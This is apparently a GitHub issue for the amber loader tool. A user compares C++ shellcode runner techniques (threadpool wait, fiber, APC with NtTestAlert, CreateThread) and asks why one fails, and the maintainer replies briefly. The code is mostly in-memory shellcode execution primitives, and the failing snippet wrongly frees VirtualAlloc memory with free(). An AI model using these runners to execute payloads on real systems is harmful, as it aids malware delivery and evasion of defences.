Partial method load fails in c++

[zhihuba]

• amber version:3.1
• os:Win10

//The following is the test code
//successful call ！！
 ////CreateThreadpoolWait
    HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
    LPVOID shellcodeAddress = VirtualAlloc(NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    RtlMoveMemory(shellcodeAddress, buf, shellSize);
    PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL);
    SetThreadpoolWait(threadPoolWait, event, NULL);
    WaitForSingleObject(event, INFINITE);
    return 0;

    ////fiber
    PVOID mainFiber = ConvertThreadToFiber(NULL);
    PVOID shellcodeLocation = VirtualAlloc(NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(shellcodeLocation, buf, shellSize);
    PVOID shellcodeFiber = CreateFiber(NULL, (LPFIBER_START_ROUTINE)shellcodeLocation, NULL);
    SwitchToFiber(shellcodeFiber);
    return 0;
	

    ////APC & NtTestAlert Code
    typedef VOID(NTAPI* pNtTestAlert)(VOID);
    pNtTestAlert NtTestAlert = (pNtTestAlert)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtTestAlert");
    LPVOID lpBaseAddress = VirtualAlloc(NULL, shellSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(lpBaseAddress, buf, shellSize);
    QueueUserAPC((PAPCFUNC)lpBaseAddress, GetCurrentThread(), NULL);
    NtTestAlert();
    return 0;
//call failed！！
 ////基础调用
    DWORD oldprotect = 0;
    LPVOID  base_addr = NULL;
    //  申请一块buf_len长度大小的空间，RW权限，不要开rwx，PAGE_EXECUTE_READWRITE 
    base_addr = VirtualAlloc(0, shellSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    // 复制shellcode到新的空间，这个函数比较罕见，用memcpy也可以呀
    RtlMoveMemory(base_addr, buf, shellSize);
    // 修改为执行RX权限
    VirtualProtect(base_addr, shellSize, PAGE_EXECUTE_READ, &oldprotect);
    // 当前进程创建线程执行shellcode
    auto ct = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)base_addr, 0, 0, 0);
    // 等待线程返回值
    WaitForSingleObject(ct, -1);
    // 释放内存
    free(base_addr);

Use multiple method tests to draw conclusions

• The failure seems to be related to CreateThread*, CreateRemote*, CreateProcess* etc. Create process, thread related
• The strange thing is that the shellcode generated by donut can be loaded and executed normally.
• Whether it is an error caused by c++ during coercion??
• https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms686736 Do not declare this callback function with a void return type and cast the function pointer to LPTHREAD_START_ROUTINE when creating the thread. Code that does this is common, but it can crash on 64-bit Windows.

[EgeBalci]

Is this issue still exists with the latest version? There are some major changes done on the loader which may fixed this issue.